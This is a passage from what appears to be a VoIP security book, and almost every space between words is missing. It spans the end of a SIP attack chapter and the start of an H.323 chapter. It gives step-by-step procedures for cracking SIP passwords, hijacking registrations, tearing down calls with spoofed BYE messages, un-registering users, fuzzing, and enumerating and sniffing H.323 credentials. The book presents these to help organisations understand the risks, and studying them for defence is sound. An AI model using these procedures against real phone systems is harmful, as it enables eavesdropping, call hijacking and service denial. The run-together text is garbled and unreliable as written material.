Onecouldalsoperformthesameattack(withoutWiresharkorSIP.Tastic)usingCain&Abel(http://www.oxid.it/cain.html/).Cain&Abelcanperformaman-in-the-middleattack,snifftheSIPauthenticationprocessbetweenaSIPUserAgentandSIPserver,andattempttocrackthepassword.Furthermore,onecouldperformanactivedictionaryattackonSIPusingvnak
(http://www.isecpartners.com/tools.html/),whichwouldchangetheattackfromanofflinedictionaryattacktoapre-computeddictionaryattack.Here'showyouwouldgainaccesstoaSIPpasswordusingCain&Abel:
1. Enablethesnifferand/orperformaman-in-the-middleattackwithCain&Abel.
2. Oncesniffingoraman-in-the-middleattackhasbegun,selecttheSniffertabatthetopoftheCain&AbelprogramandthenthePasswordstabatthebottomoftheprogram.
3. OncethePasswordstabhasbeenselected,highlightSIPintheleft-handcolumnasshowninFigure2-8.
Figure2-8.SIPinformationfromCain&Abel
4. AsSIPauthenticationrequestsaresniffedoverthewire,selectarequesttocrack,right-click,andselectSendtoCracker.
5. SelecttheCrackertabatthetopoftheprogram.
6. HighlightarowthathastheSIPauthenticationinformationsniffedoverthenetwork.
7. Right-clickthehighlightedrowandselectDictionaryattack►Addtoaddalibrarytoperformthedictionaryattackwith,suchasisec.dict.txt.
8. Oncethedictionaryhasbeenselected,selectStartandwaitforCain&Abeltocrackthepassword.
You'redone!
Note✎
Caincanalsoperformabrute-forceattackifyouselectBrute-forceinstep7insteadofDictionaryattack.
Man-in-the-MiddleAttack
Inadditiontoanofflinedictionaryattack,SIPisalsovulnerabletoaman-in-the-middleattack,asshowninFigure2-9.ThisattackusesARPcachepoisoningorDNSspoofingtechniquestoallowtheattackertogetbetweenaSIPserverandthelegitimateSIPUserAgent.Oncetheattackerisroutingtrafficbetweenthetwolegitimateentities,hecanperformaman-in-the-middleattackandauthenticatetotheSIPserverwithoutknowingavalidusernameandpassword.AuthenticatingtotheSIPserversignificantlyincreasestheattacksurfaceofaSIPimplementation.Duringtheattack,asshowninFigure2-9,theattackermonitorsthenetworktoidentifywhenSIPUserAgentssendauthenticationrequeststotheSIPserver.Whentheauthenticationrequestoccurs(step1),heinterceptsthepacketsandpreventsthemfromreachingtherealSIPserver.HethensendshisownauthenticationrequesttotheSIPserver(step2).Usingthechallenge/responsemethodforauthentication,the
Usingthechallenge/responsemethodforauthentication,theSIPserversendsanoncetotheattacker(step3).TheattackerreceivesthenonceandthensendsthesamenoncetothelegitimateUserAgent,whowasattemptingtoauthenticateoriginally(step4).ThelegitimateUserAgentthensendstheattackeravalidMD5hashvaluethatisderivedfromtherealpasswordandSIPserver'snonce(step5),thinkingtheattackeristheactualSIPserver.OncetheattackerhasthevalidMD5digesthashvaluefromthelegitimateUserAgent,hesendsthehashonbehalfofhimselftotheSIPserverandsuccessfullyauthenticates(step6).
Figure2-9.Man-in-the-middleattackwithSIPauthentication
RegistrationHijacking
RegistrationhijackingusesadatedattackclassbutstillworksinmanynewtechnologiessuchasVoIP.TheattacktakesadvantageofaUserAgent'sabilitytomodifytheContactfieldintheSIPheader.
Note✎
Spoofingtheidentityofauserisnothingnew;attackershavebeenspoofingemailsinSMTPmailmessagesformanyyears.ThesameideaappliestoSIPREGISTERorINVITEmessages,whereausercanmodifytheContact
fieldintheSIPheaderandclaimtobeanotherUserAgent.
WhenaUserAgentregisterswithaSIPRegistrar,manythingsareregistered,includingtheUserAgent'spointofcontactinformation.Thepointofcontactinformation,listedintheContactfieldintheSIPheader,containstheIPaddressoftheUserAgent.ThisinformationallowsSIPProxyserverstoforwardINVITErequeststothecorrecthardphoneorsoftphoneviatheIPaddress.Forexample,ifSoniawantedtotalktoKusum,theProxyserversinbothnetworkswouldhavetohavethecontactinformationinordertolocateeachofthem.Figure2-10showsasampleregistrationrequestfromtheSIPUserAgentcalledSonia(noticetheContactfieldfortheuser).
Figure2-10.SIPregistrationrequest
InFigure2-10,therearenocryptographicprotectionsinthepreviousSIPREGISTERrequest.Thisopensthedoorforattackerstospooftheregistrationrequestandhijackthe
identitiesofSIPUserAgents.InordertohijacktheregistrationofaSIPUserAgent,anattackercansubmitthesameregistrationrequestpacketshownpreviouslybutmodifytheContactfieldintheSIPheaderandinsertherownIPaddress.Forexample,ifanattackernamedRainawantedtohijacktheregistrationofausercalledSonia,shewouldreplacetheContactfield,whichcontainsSonia'sIPaddressof192.168.5.122,withherown,whichis192.168.5.126.RainawouldthenspoofaREGISTERrequestwithherIPaddressinsteadofSonia's,asshowninFigure2-11(noticethattheFromfieldstillsaysSonia@192.168.2.101,buttheContactfieldsaysRaina@192.168.5.126).
Figure2-11.SpoofedREGISTERpacket
ThebestmethodofspoofingaSIPmessageiswiththeSiVuStool(http://www.vopsecurity.org/),aVoIPscannerprimarilyusedforSIP-basedimplementations.Amongotherthings,SiVuScandiscoverSIPnetworks,scanSIPdevices,andcreateSIPmessages.ItsabilitytocreateSIPmessagesisveryusefulfortheregistration-hijackingattack.Forexample,here'showyoucoulduseSiVuStospoofaregistrationattackandhijackanotheruser'sidentityontheSIPnetwork.
1. OpenSiVuS.2. UndertheSIPtab,selectUtilities►MessageGenerator.3. IntheSIPMessagesection,entervaluesathroughmfrom
thefollowingtext.Replaceitalictextwiththecorrectvaluesfromyourlocalnetwork.ThevaluesarebasedontheuserRaina'shijackingtheregistrationoftheuserSonia(basedonthelegitimaterequestinFigure2-10).Noticestepminitalicbold,whereRainainsertsherowncontactIPaddress.Sonia'sinformationislistedinstepshandi:a. Method:REGISTERb. Transport:UDPc. CalledUser:Soniad. Domain:192.168.2.102e. Port:49304f. Via:SIP/2.0/TCP192.168.5.122g. Branch:z9hG4bK-d87543-8C197c3ebd1b8855-1-d87543h. To:Sonia<sip:Sonia@192.168.2.102>i. From:Sonia<sip:Sonia@192.168.2.102>j. FromTag:ff761a48k. Call-ID:
845b1f52dd197838MThmMDVhZWRkYZIxMmI1MjNiNDA4MThmYTJiODdiMzM
l. Cseq:1Registerm. Contact:sip:Raina@192.168.5.126
4. ClicktheStartbutton.(TheconfigurationinformationisalsoshowninFigure2-12.)
Figure2-12.SpoofingSIPmessagesusingSiVuS
Beforethepreviousexercisecanhijackasession,theattackerneedstotakethelegitimateuseroffthenetwork.Agoodmethodtodothisisbyde-registeringthelegitimateSIPUserAgentfromtheSIPProxyserver,asdiscussedlaterin"DenialofServiceviaBYEMessage"onSpoofingSIPProxyServersandRegistrars.OncethehijackingattackmessageissubmittedtotheSIPProxyserver,theattackerhassuccessfullyhijackedtheUserAgent'sregistration.
SpoofingSIPProxyServersandRegistrars
ThenumberofSIPspoofingattacksisquitelarge,includingtheabilitytospoofaresponsefromSIPinfrastructureservers,suchasSIPProxyserversandSIPRegistrars.Duringa
registrationrequest,aSIPUserAgentsendsaSIPProxyorRegistrarserveraREGISTERmessage.AnattackercanthensubmitaforgedresponsefromthedomainandredirecttheUserAgenttoaSIPProxyserverorRegistrarthatshecontrols.Forexample,ifaSIPUserAgenttriedtocontacteNapkin.comwiththecontactaddress172.16.1.100,anattackercouldforgetheresponseforeNapkin.com,butwiththecontactaddressof192.168.1.150,aSIPProxy/Registrarthattheattackercontrols.WhenthelegitimateUserAgentwishestocallusersineNapkin.com,theattackercanredirectthecallstoUserAgentshecontrols,therebyreceivingorrecordingphonecallsthatareintendedforsomeoneelse.
DenialofServiceviaBYEMessage
SimilartoH.323andIAXsignalingprotocols,SIPisalsovulnerabletomanyDenialofService(DoS)attacks.ThefirstDoSattacktodiscussissimplyspoofingaBYEmessagefromoneUserAgenttoanother.ABYEmessageissentfromoneusertoanothertoindicatethattheuserwishestoterminatethecallandthusendthesession.Innormalcircumstances,aUserAgentwouldsubmitaBYEmessageoncethecallhasbeencompleted.However,anattackercanspoofaBYEmessagefromoneusertoanotherandterminateanycallinprogress.Beforethisattackcantakeplace,anattackerneedstosniffafewitemsfromanexistingconversationbetweentwoparties(fromanINVITEmessageorsimilar),specificallytheCall-IDandtagvalues.Aftertheattackerhascapturedtheseentitiesoverthenetwork,hecancreateaBYEmessage,forgingtheFromfieldasonesideoftheconversationandaddingthevictimintheTofield.OncetheFromfield(whichistheattacker'sspoofedsourceaddress),theTofield(whichisthevictim),theCall-IDvalue,andtagvaluesareaccurateforthecall,theattackercansendthepacketandthecallwillbeinstantlyterminated(notethatallthisinformationisavailableoverthe
networkincleartext).CompletethefollowingstepstoteardownaSIPsessionbetweentwoentitiesbyusingaBYEmessage:
1. OpenSiVuS.(TheremainderofthestepsareSiVuS-specific.)
2. UndertheSIPtab,selectUtilities►MessageGenerator.3. IntheSIPMessagesection,entervaluesathroughj,
replacingitemsinboldthatcorrespondtoyourlocalnetwork.ThevaluesintheexamplebelowarebasedontheattackerRaina'sterminatingacallbetweenKusumandSonia(basedonthelegitimaterequestinFigure2-10):a. Method:BYEb. Transport:UDPc. CalledUser:Soniad. Domain:192.168.2.102e. Via:SIP/2.0/TCP192.168.5.122f. To:Sonia<sip:Sonia@192.168.2.102>g. From:Kusum<sip:Kusum@192.168.2.102>h. FromTag:ff761a48i. Call-ID:
845b1f52dd197838MThmMDVhZWRkYZIxMmI1MjNiNDA4MThmYTJiODdiMzMj. Cseq:2Bye
4. SelecttheStartbutton.(TheconfigurationinformationisalsoshowninFigure2-13.)
Figure2-13.SIPteardownattackwithSiVuS
NoticeintheConversationLogareainFigure2-13thattheSIPProxyserverreturnsa200OKmessagetotheuser,indicatingthatthespoofedBYEmessagewassuccessfulandthecallwasterminated.TheConversationLogisalsoshownbelow:
SIP/2.0200OKVia:SIP/2.0/TCP192.168.5.122;branch=;received=192.168.5.122From:"iSEC"<sip:Sonia@192.168.2.102>;tag=ff761a48To:"iSEC"<sip:Kusum@192.168.2.102>;tag=as3a9bd758Call-ID:845b1f52dd197838MThmMDVhZWRkYZIxMmI1MjNiNDA4MThmYTJiODdiMzMCSeq:2BYEUser-Agent:AsteriskPBXAllow:INVITE,ACK,CANCEL,OPTIONS,BYE,REFER,SUBSCRIBE,NOTIFYContent-Length:0
AsimilarDenialofServiceattackcanbeconductedwiththeSIPCANCELmethodusingthesamestepsasabove.Insteadofterminatinganexistingcallinprogress,whichispossiblevia
BYE,theCANCELmethodcanbeusedtoexecuteaSIPDoSattackonSIPUserAgentsattemptingtostartacall.Hence,aBYEattackcanbeusedduringacall,andaCANCELattackcanbeusedbeforethecallstarts.
DenialofServiceviaREGISTER
Similartotheregistration-hijackingattack,anattackercanperformaDenialofServiceattackbyassociatingalegitimateUserAgentwithafakeornon-existentIPaddress.Whencallsareredirectedtothenon-existentIPaddress,therewillbenoresponseandthecallwillfail.InordertoperformaDenialofServiceattackviaaREGISTERpacket,anattackercansubmitthesameregistrationrequestpacketshowninFigure2-10butmodifytheContactfieldintheSIPheaderandinsertafake/non-existentIPaddress.Forexample,ifanattackercalledRainawantedtocarryoutaDoSattackontheusercalledSonia,shecouldreplacetheContactfield,whichhasSonia'sIPaddressof192.168.5.122,withafakeonelike118.118.8.118.RainawouldthenspoofaREGISTERrequestwiththefakeIPaddressinsteadofSonia's,asshowninFigure2-14.
Figure2-14.SpoofingContactfieldinSIPmessages
DenialofServiceviaUn-register
OurnextDenialofServiceattackinvolvesun-registeringSIP
UserAgents.Un-registeringmakesitpossibletoremoveaSIPUserAgentfromaProxyserverorRegistrar.Whileun-registeringisnotastandardmethodstatedintheSIPRFC,theabilitytoun-registeraUserAgentissupportedbyafewSIPdevices.
Note✎
Theun-registrationprocesshasnothingtodowithanexistingcallandshouldnotbeconfusedwiththeSIPBYEmethod.
Theproblemwiththeun-registrationmethodisthatauthenticationisusuallynotrequiredtoremoveaUserAgentfromaSIPProxyserverorRegistrar.Hence,ifaSIPUserAgentislegitimatelyregisteredtoaSIPProxyserver,anattackercansimplyattempttoun-registertheUserAgent.Inordertoun-registeraUserAgent,theREGISTERmethodisused(thereisnoUNREGISTERmethodinSIP).WhensendingtheREGISTERmethod,insteadofplacingastandardexpirationvalueinthepacket(ExpiresvalueintheSIPheader),suchas3600or7200,theattackersetsthevaluetozero.TheattackerthensendstheREGISTERpacketwiththeExpiresvaluesettozerototheSIPProxyserverorRegistrar,whichtellstheservertoun-registertheUserAgentimmediately.ThelegitimateUserAgentcanattempttore-register,buttheattackercansimplysendanotherUDPpacketandimmediatelyun-registerit.BecausetheattackinvolvesonlyoneUDPpacket,theattackercanexecutetheun-registrationprocessonceeveryfewminutesforanindefiniteperiodoftime.ThiswillpreventthelegitimateSIPUserAgentfromregisteringtotheSIPProxyserverorRegistrar.Furthermore,thisattackcanbeusedinconjunctionwiththeregistration-hijackingattackdiscussedpreviously.Here'showtoun-registeraSIPsessionbetweentwoentities:
1. OpenSiVuS.
2. UndertheSIPtab,selectUtilities►MessageGenerator.3. IntheSIPMessagesection,enterthecorrectvaluesinall
fieldsfortheREGISTERmessage.Valuesathrulcanbeenteredfromthefollowinglist,replacingallitemsinitalicfromyourlocalnetwork.TheexamplebelowisbasedontheattackerRaina'sterminatingacallbetweenKusumandSonia(basedonthelegitimaterequestinFigure2-10).Noticestepl,wheretheExpiresvalueissettozero:a. Method:REGISTERb. Transport:UDPc. CalledUser:Soniad. Domain:192.168.2.102e. Via:SIP/2.0/TCP192.168.5.122f. To:Sonia<sip:Sonia@192.168.2.102>g. From:Kusum<sip:Kusum@192.168.2.102>h. FromTag:ff761a48i. Call-ID:
845b1f52dd197838MThmMDVhZWRkYZIxMmI1MjNiNDA4MThmYTJiODdiMzM
j. Cseq:1REGISTERk. Contact:*l. Expires:0
4. SelecttheStartbutton.(TheconfigurationinformationisalsoshowninFigure2-15.)
FuzzingSIP
Fuzzingistheprocessofsubmittingrandomdatatoaprotocolorapplicationinordertocauseittofail.Iftheprogramfails(crashes),securityissuesmaybeidentifiedatfailurepointswithintheprotocolorapplication.TheSIPprotocolcanbefuzzedtotesttherobustnessofavendor'simplementationof
SIP.Forexample,iftheprotocolcannotdefendagainstcommonfuzzingtechniques,theavailabilityoftheVoIPnetworkcouldbeaffected.
Figure2-15.Un-registeringSIPUserAgents
ThePROTOSproject(http://www.ee.oulu.fi/research/ouspg/protos/testing/c07/sip/index.html/hasaSIPfuzzingtoolthatcanbeusedtotestaVoIPnetworkthatusesSIP.We'llusethePROTOStooltofuzztheSIPprotocolasfollows:
1. Downloadthefuzzer(aJava.jarfile)fromhttp://www.ee.oulu.fi/research/ouspg/protos/testing/c07/sip/c07-sip-r2.jar/.You'llneedtohaveaJavaVMrunningonyouroperatingsystem.
2. Enterthefollowingonthecommandlineinordertogetthe
optionsforthetool:java-jarc07-sip-r2.jar
3. InordertotestaSIPProxyserver/RegistrarwiththeIPaddressof192.168.11.17,enterthefollowingonthecommandline:
java-jarc07-sip-r2.jar-touri1108@192.168.11.17-dport5060
AsshowninFigure2-16,thefuzzerwillrunthroughallitstestcasesonebyone.IftheSIPProxyserver/Registrarfails,thefuzzermayhavefoundasecurityissuewithit.(Itisneitherquicknoreasytofindasecurityissuewithfuzzing,butitisthefirststepofamultiple-stepapproach.)
Figure2-16.FuzzingSIP-id001
SummarySIPisemergingasamajorsignalingprotocolinVoIPinfrastructures,especiallyonPC-basedsoftphones.BecauseSIPislargelybasedonHTTP,itisprobablythemostseamlessprotocoltobeusedwithIPnetworks.Bythesametoken,itinheritsquiteafewofHTTP'ssecurityexposures.Aswehaveseen,SIP'sauthenticationmethodsarevulnerabletoseveralattacks,includingpassivedictionaryattacks.SIP'sauthenticationmodelalsoallowsattackerstoretrievetheUserAgent'spasswordquiteeasily.Furthermore,theidentityofanySIPUserAgentcannotbetrustedbecauseattackerscanhijackregistrationattemptsoflegitimateSIPdevices.ThereliabilityoftheSIPnetworkleavesmuchtobedesired.WehavediscussedonlyafewofthelargeamountofDenialofServiceattacksagainstSIPUserAgentsandservers.Voicecommunications,including911calls,requireahighlevelofreliability.ManySIPentities,includinghardphones,softphones,gateways,andbordercontrollers,arequiteeasytotakeoffline,cutoff,orsimplyensurethatnocommunicationtakesplace.WhenbuildingaVoIPnetworkusingSIP,itisimportanttoknowaboutthemajorproblemswithauthenticationandreliability.ThischapterhasfocusedonSIP'sflawsinordertohelporganizationsunderstandtherisks.Chapter9willdiscussthedefensesforVoIPcommunication,includingtheuseofSSIP(SecureSIP).
Chapter3.SIGNALING:H.323SECURITYH.323,anInternationalTelecommunicationUnion–TelecommunicationStandardizationSector(ITU-T)standard,isaverycommonsignalprotocolusedonVoIPnetworks.Asasignalingprotocol,itisusedforregistration,authentication,andestablishingendpointsonthenetwork.SimilartoSIP,H.323handlessignalingandreliesonRTPformediatransfer(discussedinChapter4).However,H.323isasystemspecificationcomprisingseveralotherITU-Tprotocols,includingH.225(managesregistration,admission,andstatus),H.245(thecontrolprotocol),H.450(offerssupplementaryservices),H.235(providessecurityservicesforbothsignalingandmediachannels),H.239(offersdualstreaming),andH.460(allowsfirewalltraversal).ManyVoIPdeploymentsuseH.323becauseitcanintegratebetterwithexistingPBXsystemsandoffersstrongerreliabilitythanSIP.FormoreinformationontheH.323standard,refertohttp://www.itu.int/rec/T-REC-H.323-200606-I/en/.ThischapterisdedicatedtoH.323securityasitpertainstoVoIP.TheemphasiswillbeonH.323'ssubprotocols,specificallytheonesthatmanageauthenticationandauthorizationforH.323endpoints(e.g.,hardphones).ThechapterwillalsocoverthebasicsofH.323securityandH.323attacks,includingauthentication,authorization,andDenialofService(DoS).
H.323SecurityBasicsThekeypartsofanH.323VoIPnetworkareendpointsanddevices,includinggatekeepers,mediaproxies,gateways,andbordercontrollers.H.323gatekeepersregisterandauthenticateH.323endpoints.TheyalsostoreadatabaseofallregisteredH.323clientsonthenetwork.H.323gateways,ontheotherhand,aredevicesthatroutecallsfromoneH.323gatekeepertoanother,whileSessionBorderControllershelp
VoIPnetworkscommunicatearoundnetworkfirewalls.RefertoChapter1formoreinformationoneachofthesedevices.ThefollowingarethecoresecurityaspectsofH.323thatwillbediscussedinthissection:
Enumeration(identifyingH.323devices)Authentication(H.225)Authorization(E.164alias)
Enumeration
Aneffectivewaytoenumerateaparticulartypeofdeviceonanetworkistoperformaportscan.Forexample,awebservercanbeenumeratedbythepresenceofport80.Table3-1liststhepossibleportsthatanH.323endpointordevicecouldbelisteningon.Whilesomeoftheportsarestatic,suchasTCPports1718,1719,and1720,manyarenot.Afterasessionhasbeeninitialized,H.323oftenneedsadynamicsetofportsbetweentheH.323endpointandgatekeeper.TheportscanbeanywherebetweenTCP1024and65535,whichisamajorreasonfirewallteamsdislikeVoIP.(VoIPandfirewallswillbediscussedinChapter9.)Table3-1.H.323Ports
Port Description StaticorDynamic
80 HTTPManagement Static
1718 GatekeeperDiscovery Static
1719 GatekeeperRAS Static
1720 H.323CallSetup Static
1731 AudioControl Static
1024-65535 H.245 Dynamic
1024-65535 H.245 Dynamic
1024,1026,…,65534(even) RTP(Audio/Video) Dynamic
RTPport+1(odd) RTCP(Control) Dynamic
CompletethefollowingexercisetoenumerateH.323devicesonanetwork.
1. DownloadNmapfromhttp://insecure.org/nmap/.2. Typenmap.exeonthecommandlinetoretrievethesyntaxof
thetool.3. Typethefollowingonthecommandlinetoenumerate
H.323endpointsandgatekeepers:nmap.exe-sT-p1718,1719,1720,1731IPAddressRange
ForaclassBnetworkon172.16.0.0network,typethefollowing:
nmap.exe-sT-p1718,1719,1720,1731172.16.0.0/16
AllIPaddressesthatshowopenintheSTATEcolumnareprobablyH.323devices.SeeFigure3-1foranexampleinwhich172.16.1.107seemstobeanH.323device.
Figure3-1.EnumeratingH.323entities
OnceanH.323device,suchasagatekeeper,hasbeenidentifiedonthenetwork,anH.323endpointcanregistertoit.Often,enterprisedeploymentsofH.323donotrequireauthenticationforH.225registration;hence,anattackercansimplydownloadtheH.323endpointofhisorherchoiceandregisterwiththegatekeeper.OnceanH.323endpointregisterstoagatekeeper,allavailableH.323information(suchasotherendpointsonthenetwork)canbeenumerated.Thisallowsanyanonymous,unauthorizedusertofindallH.323entitiesonthenetwork,includingE.164aliasesforspoofingattacks(discussedlaterinthischapter).CompletethefollowingexercisetoregisterwithanH.323gatekeeper.
1. DownloadPowerPlay(http://www.bnisolutions.com/products/powerplay/ipcontact.html/oryourfavoriteH.323client.
2. OpenPowerPlaybychoosingStart►Programs►PowerPlay►PowerPlayControlPanel.
3. SelecttheGatekeepertab.4. Inthemiddleofthescreen,thereisatextboxwithtwo
options—oneistoautomaticallydiscoverH.323gatekeepers,andtheotherisforstaticallysettingthegatekeeperaddress.TypetheIPaddressofanynodethathadport1719openfromtheportscanresults.Alternatively,selectAutomaticDiscovery,andPowerPlaywillfindtheH.323gatekeepersautomatically.
5. Oncethegatekeeperisenteredintothetextbox,clickOK.ThePowerPlayiconinthetaskbarwillturngreenonceithasregisteredwiththegatekeeper(assumingauthenticationhasnotbeenenabled,whichisthenorm).
Done!YouhavenowenumeratedH.323gatekeepersonthe
networkandsuccessfullyregisteredyourH.323client.Atthispoint,voicecallstootherH.323clientscanbeperformed.Additionally,enumerationoftheVoIPnetworkcannowoccur,providingyouwithE.164aliasesandphonenumbers.IftheH.323gatekeeperonthenetworkrequiresauthentication,considerusingEkiga(http://ekiga.org/),analternativeH.323clientthathasauthenticationsupport.CompletethefollowingexercisetoregisterwithanH.323gatekeeperthatrequiresauthentication.
1. DownloadandinstallEkigafromhttp://ekiga.org/.2. OpenEkigabychoosingStart►Programs►Ekiga►Ekiga.3. SelectEdit►Accounts►Add.4. Enterthefollowinginformation:
a. AccountName:AccountNameb. Protocol:H.323c. Gatekeeper:IPaddressofgatekeeperfoundwiththeport
scan
d. User:Usernamefortheaccounte. Password:Passwordfortheaccount
Authentication
H.323endpointscanusethreedifferentmethodsforauthentication:symmetricencryption,passwordhashing,andpublickey.
SymmetricEncryption
SymmetricencryptionusesasharedsecretbetweentheH.323endpointandgatekeeper.EachendpointhasaGeneralIDsetupbeforehand,whichalongwiththereceiver'sGeneralID,atimestamp,andarandomnumberisencodedbythesecretkey
(derivedfromthesharedsecret).ThisCryptoTokenisthensenttotheauthenticatingdevice.Theauthenticatingdeviceperformsthesamefunctionandchecksthattheitemsmatchtodetermineiftheregistrationissuccessful.
PasswordHashing
Thesecondmethodforauthenticationispasswordhashing.H.323endpointsuseausername(H.323IDorGeneralID)andpassword(viaH.225)forH.323devices,suchasamediagatewayormediaproxy.Inordertoprotecttheendpoint'spassword,itisnotsentoverthenetworkincleartext.ThepasswordishashedusingtheMD5hashingalgorithm.However,becausecreatinganMD5hashofjustthepasswordwouldmaketheauthenticationmethodvulnerabletoareplayattack,thepasswordiscombinedwiththeusername(H.323IDorGeneralID)andanNTPtimestampinordertomakethehashuniqueforeachauthenticationrequest.Thetimestamp,username,andpasswordareASN.1-encodedindividuallyandthencombinedtocreateanASN.1buffer.TheASN.1bufferisthenhashedusingMD5andsenttothegatekeeper.
Note✎
ASN.1(AbstractSyntaxNotationOne)isasetofencodingrulesthattransformdataintoastandardformatforlaterabstraction.ASN.1-encodeddatacanbedecodedbyanyentitythathasASN.1support,whichareanyH.323endpoints,gateways,andgatekeepers.H.323usesASN.1andPER(PackedEncodingRules)toreducepacketsizeforlow-bandwidthnetworksand/oroptimalthroughput.
OncethegatekeeperhastheMD5hash,itcanperformthesamefunctionastheH.323endpointinordertoensurethattheendpointhasthecorrectpassword.Thegatekeeperperformsthesamehashingexercise,usingtheASN.1-encoded
username,password,andtimestamp(fromtheNTPserver)toseeifbothhashesmatch.Iftheydo,thegatekeeperknowsthattheH.323endpointhasusedthecorrectpassword.Ifthehashesdonotmatch,thegatekeeperknowsthatthepasswordusedbytheendpointisnotcorrectandtherefore,theendpointisnotauthenticated.Figure3-2illustratestheauthenticationprocesswithH.225.InFigure3-2,anexampleauthenticationprocessisshownbetweenanH.323endpointandauthenticator,suchasagatekeeper.Thestepsareasfollows:
1. TheH.323endpointrequestsauthentication.2. BothentitiesgetthetimestampfromtheNTPserver,which
isbasedonthetimeelapsedinsecondsfromJanuary1,1970.
3. TheendpointASN.1encodesitsusername,password,andNTPvaluesindividuallyandthencreatesanASN.1buffer.
4. TheASN.1bufferisusedtocreatetheMD5hash(identifiedascryptoEPPwdHashinthepacket),whichisthensenttothegatekeeper.
Figure3-2.H.323authenticationprocess
5. Thegatekeeper,whichalreadyknowstheusernameandpassword,retrievesthetimestampinformationfromthe
NTPservertoperformthesameexercise.IftheMD5hashcreatedbythegatekeepermatchestheMD5hashthattheH.323endpointsentoverthenetwork,thegatekeeperknowsthatthepasswordiscorrectandcanthenauthenticatetheendpoint.
Ofalltheauthenticationmethods,passwordhashingseemstobethemostcommon,butit'salsovulnerabletoafewattacks(asdiscussedin"H.323SecurityAttacks"onH.323SecurityAttacks).
PublicKey
Thelastmethodofauthenticationispublickey.ThismodelusescertificatesinsteadofsharedsecretslocatedontheendsoftheH.323authenticationprocess.Thismethodisthemostsecureforauthentication,butitisalsothemostcumbersomebecauseoftheuseofcertificatesoneachendpointoftheVoIPnetwork.
Authorization
H.323endpointsuseanE.164aliasforidentification.TheE.164aliasisaninternationalnumbersystemthatcomprisesacountrycode(CC),optionalnationaldestinationcode(NDC),andasubscribernumber(SN).AnE.164aliascanbeupto15numericvaluesinlength,setdynamicallybyagatekeeperorlocallybytheendpointitself.TheE.164aliasiscommonlyusedastheprimaryidentifierforH.323endpoints.Thealiasisalsousefulforsecurity,asaliasescanbegroupedfordifferentcallprivileges.Forexample,onespecificsetofE.164aliasescanbeallowedtoregistertogatekeepersandmakecallsanywhere(e.g.,aliasesstartingwith510),whileadifferentgroupofE.164aliasesmightbeauthorizedtoregisteranddialinternalnumbers(e.g.,aliasesstartingwith605).Yetanothersetofaliasesmightbeabletocallexecutiveconferencebridges(e.g.,aliasesstartingwith
415).Figure3-3showshowE.164aliasescanbeusedtocontroldial-outproceduresbyH.323endpoints.
Figure3-3.E.164aliasforsecuritycontrols
Figure3-3showsanexampleauthorizationprocessbetweengatekeepersthatpermitaccesstocertaintypesoffunctionsbasedontheE.164alias.ThegatekeeperallowsonlyoutboundinternationalcallstoagroupA,unlimitedinternalcallstogroupB,andcallstotheexecutiveconferencebridgetogroupC.
Note✎
Whenitcomestosecurity,E.164aliasescanbeconsideredsimilartoaMACaddressonEthernetcards.MACaddressfilteringisoftenusedonEthernetswitchestolimitaccesstocertainpartsofanetwork.WhileE.164aliasarenotMACaddressequivalents(endpointsstillhavetheirownEthernetMACaddresses),theE.164aliasisusedasatrustedidentifierforH.323endpoints.
H.323SecurityAttacksH.323endpointsuseH.225'sRegistrationAdmissionStatus(RAS)formanysecurityitems,includingauthenticationandregistrationfunctions.RASservicesallowendpoints,gatekeepers,andgatewaystochatterwithoneanotherinordertoensurethateachdeviceisregistered,cantalkappropriately,andisstillalive.Itemslikeregistrationconnectivity,bandwidthchanges,active/non-activestatus,andun-registrationsbetweenendpoint/gatekeepersoccurwiththeuseofRAS.Intermsofsecurity,RAShandleskeycomponentsforH.323networks.Forexample,whenanH.323endpointisconnectedtothenetwork,itmustuseRAS'sregistrationfunctiontospeakintheVoIPenvironment.IftheendpointisunabletoregisterorcannotregisterviaRAS,theendpointissimplynotthere.RASalsohandlesauthenticationforH.323.Onceanendpointisregistered,theendpoint'susername/passwordisconfirmedto/fromthegatekeeper.AfterregistrationandauthenticationhaveoccurredviaRASonH.323VoIPnetworks,endpointscanstartmakingorreceivingphonecalls.BeforetheRASservicesareimplemented,neithercanhappen.H.225'sregistration(authentication)processdoesprotectthepasswordagainstcommonsniffingattacks,becauseitdoesnotsendthepasswordacrossthenetworkincleartext.Unfortunately,H.225isstillvulnerabletomanysecurityattacks.Theattacksthatwillbediscussedare:
Usernameenumeration(H.323ID)H.323passwordretrieval(offlinedictionaryattack)ReplayattackonH.225authenticationH.323endpointspoofing(E.164alias)E.164aliasenumerationE.164hoppingattacks
DenialofServiceviaNTPDenialofServiceviaUDP(H.225registrationreject)DenialofServiceviaH.225nonStandardMessageDenialofServiceviaHostUnreachablepackets
UsernameEnumeration(H.323ID)
WhenauthenticationisrequiredbetweenagatekeeperandanH.323endpoint,theH.323endpointwillsenditsusernameandpasswordtotheauthenticatingdevice,asnotedinthearchitecturedescribedinFigure3-2.InordertocapturetheusernameusedbytheH.323endpoint,anattackercansimplysniffthenetworkandcapturetheusernameincleartext.Aswitchednetworkprovideslittleprotectionasanattackercanperformaman-in-the-middleattackandcapturealltheH.225usernameswithinthelocalsubnet.Severalattackscanbeattemptedbyanattackeroncetheusernamehasbeencaptured,includingbrute-forceattacks.Wiresharkcanbeusedasthesnifferprogramtocapturetheusername,whichwillbenotedastheH.323-IDundertheH.225.0RASsectionofthepackettrace.CompletethefollowingexercisetosnifftheH.225usernameduringtheauthenticationprocessoftwoH.323devices.
1. EnsurethattheH.323gatekeeperhasbeenenabledonyourlabnetwork.
2. OpenyourfavoriteH.323client.3. OpenWiresharkfornetworksniffingbychoosingStart►
Programs►Wireshark►Wireshark.4. Fromthemenubar,selectCapture►Interfaces►Prepare.5. SelectUpdateslistofpacketsinrealtime,thenselectStart.6. FromtheH.323endpoint,connecttotheH.323gatekeeper
usingEkigabyenteringitsIPaddressintheappropriate
location.Furthermore,ensurethatthecorrectusernameandpasswordhavebeenenteredforH.225authentication.(Inourexample,theH.323endpointusestheusernameofUSER.)
7. OncetheH.323endpointisconnectedtoH.323gatekeeper,stopsniffingonWireshark.
8. UsingWireshark,scrolldownandselectapacketthathastheProtocollabelofH.225.0andtheInfodescriptionasRAS:RegistrationRequest(asshowninlinenumber4950inFigure3-4).
Figure3-4.WiresharkandH.225packets
9. IntheprotocoldetailssectionofWireshark(middlesection),expandthefollowing:H.225.0RAS►RASMessage:registrationRequest►registrationRequest►cryptoTokens►Item0►Item:cryptoEPPwdHash►cryptoEPPwdHash►alias:H.323-ID►H323.ID:[USERNAME]TheentrylabeledH323.ID:[USERNAME]istheusernameoftheH.323endpoint,whichisshownasUSERincleartext,asyoucanseeinFigure3-5.
